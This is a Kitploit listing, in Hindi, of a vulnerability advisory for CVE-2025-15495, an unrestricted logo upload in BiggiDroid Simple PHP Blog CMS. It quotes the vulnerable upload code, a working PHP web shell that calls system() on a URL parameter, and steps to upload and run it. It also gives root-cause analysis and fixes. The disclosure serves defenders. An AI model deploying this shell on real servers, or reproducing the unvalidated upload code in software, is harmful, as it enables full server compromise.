RCE-Simplephpblog-biggiedroid — CVE-2025-15495 - मनमाना फ़ाइल अपलोड जिससे दूरस्थ कोड निष्पादन (RCE) होता है | Kitploit
उपकरण / GitHub / asim-qazi / rce-simplephpblog-biggiedroid
asim-qazi/rce-simplephpblog-biggiedroid RCE-Simplephpblog-biggiedroid CVE-2025-15495 - मनमाना फ़ाइल अपलोड जिससे दूरस्थ कोड निष्पादन (RCE) होता है
हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।
पिछले 7 दिन पिछले 30 दिन
9 8 महीने पहलेCVE-2025-15495 - मनमाना फ़ाइल अपलोड जिससे रिमोट कोड निष्पादन (RCE) होता है
उत्पाद
BiggiDroid – Simple PHP Blog CMS
उत्पाद पृष्ठ: https://biggidroid.com/product/simple-php-blog/
भेद्यता प्रकार
मनमाना फ़ाइल अपलोड
अप्रतिबंधित फ़ाइल अपलोड
रिमोट कोड निष्पादन (RCE)
गंभीरता
गंभीर (Critical)
CVSS (अनुमानित): 9.8 (AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H)
सारांश
Simple PHP Blog CMS में प्रशासन पैनल की साइट लोगो अपलोड कार्यक्षमता में एक अप्रतिबंधित फ़ाइल अपलोड भेद्यता है।
एक प्रमाणित हमलावर एक दुर्भावनापूर्ण PHP फ़ाइल को एक छवि के रूप में प्रच्छन्न करके अपलोड कर सकता है, जो वेब-सुलभ निर्देशिका में संग्रहीत होती है और सर्वर द्वारा निष्पादित की जाती है, जिसके परिणामस्वरूप रिमोट कमांड निष्पादन होता है।
प्रभावित घटक
प्रशासन पैनल → साइट लोगो अपडेट करें
प्रासंगिक कमजोर कोड स्निपेट:
$target = "../image/".basename($_FILES['image']['name']);
$image = $_FILES['image']['name'];
$query = mysqli_query($con,
"UPDATE sitedetails SET sitelogo='$image' WHERE id='$id'");
if (move_uploaded_file($_FILES['image']['tmp_name'], $target)) {
// success
}
समस्याएँ
कोई फ़ाइल एक्सटेंशन सत्यापन नहीं
कोई MIME प्रकार सत्यापन नहीं
कोई सर्वर-साइड फ़ाइल सामग्री जाँच नहीं
प्रूफ ऑफ कॉन्सेप्ट (PoC)
एक दुर्भावनापूर्ण PHP फ़ाइल बनाएँ shell.php नामक एक फ़ाइल बनाएँ:
<?php
$cmd = $_GET['cmd'] ?? '';
echo "<pre>";
system($cmd);
echo "</pre>";
?>
प्रशासन पैनल के माध्यम से फ़ाइल अपलोड करें
प्रशासन पैनल में लॉग इन करें
साइट लोगो → लोगो अपडेट करें पर जाएँ
लोगो फ़ाइल के रूप में shell.php अपलोड करें
फ़ॉर्म सबमिट करें
📌 एप्लिकेशन बिना सत्यापन के PHP फ़ाइल स्वीकार करता है
अपलोड किए गए वेब शेल तक पहुँचें अपलोड करने के बाद, फ़ाइल इस पर उपलब्ध है:
http://127.0.0.1/image/shell.php
सिस्टम कमांड निष्पादित करें:
http://127.0.0.1/image/shell.php?cmd=dir
सफल कमांड निष्पादन सर्वर OS कमांड निष्पादित करता है और आउटपुट लौटाता है, जो रिमोट कोड निष्पादन की पुष्टि करता है।
प्रूफ ऑफ कॉन्सेप्ट
उत्पाद पृष्ठ
इस स्थान से शेल अपलोड करें।
शेल PHP
रिमोट कोड निष्पादन
कमजोर कोड
प्रभाव
मनमाना OS कमांड निष्पादित करें
संवेदनशील कॉन्फ़िगरेशन फ़ाइलें पढ़ें
एप्लिकेशन डेटा को संशोधित या हटाएँ
स्थायी बैकडोर अपलोड करें
होस्टिंग सर्वर से पूरी तरह समझौता करें
यह भेद्यता पूर्ण सर्वर अधिग्रहण का कारण बन सकती है।
मूल कारण विश्लेषण
फ़ाइल एक्सटेंशन व्हाइटलिस्ट गायब
कोई MIME प्रकार प्रवर्तन नहीं
उपयोगकर्ता द्वारा प्रदान किए गए फ़ाइलनाम का सीधा उपयोग
अपलोड निर्देशिका PHP निष्पादन की अनुमति देती है
कोई .htaccess / सर्वर हार्डनिंग नहीं
✅ अनुशंसित सुधार
फ़ाइल एक्सटेंशन प्रतिबंधित करें
$allowed = ['jpg','jpeg','png','gif'];
MIME प्रकार मान्य करें
अपलोड की गई फ़ाइलों का नाम बदलें
रैंडम UUID का उपयोग करें
कभी भी उपयोगकर्ता फ़ाइलनाम पर भरोसा न करें
📚 संदर्भ
OWASP अनप्रतिबंधित फ़ाइल अपलोड
CWE-434: खतरनाक प्रकार वाली फ़ाइल का अनप्रतिबंधित अपलोड
OWASP शीर्ष 10 – A03: इंजेक्शन
🧑💻 खोजकर्ता
मो आसिम (Mo Asim) जिन्हें आसिम काज़ी (Asim Qazi) के नाम से भी जाना जाता है
Github: @Asim-Qazi
Linkedin: Asim Qazi
छात्र | सुरक्षा शोधकर्ता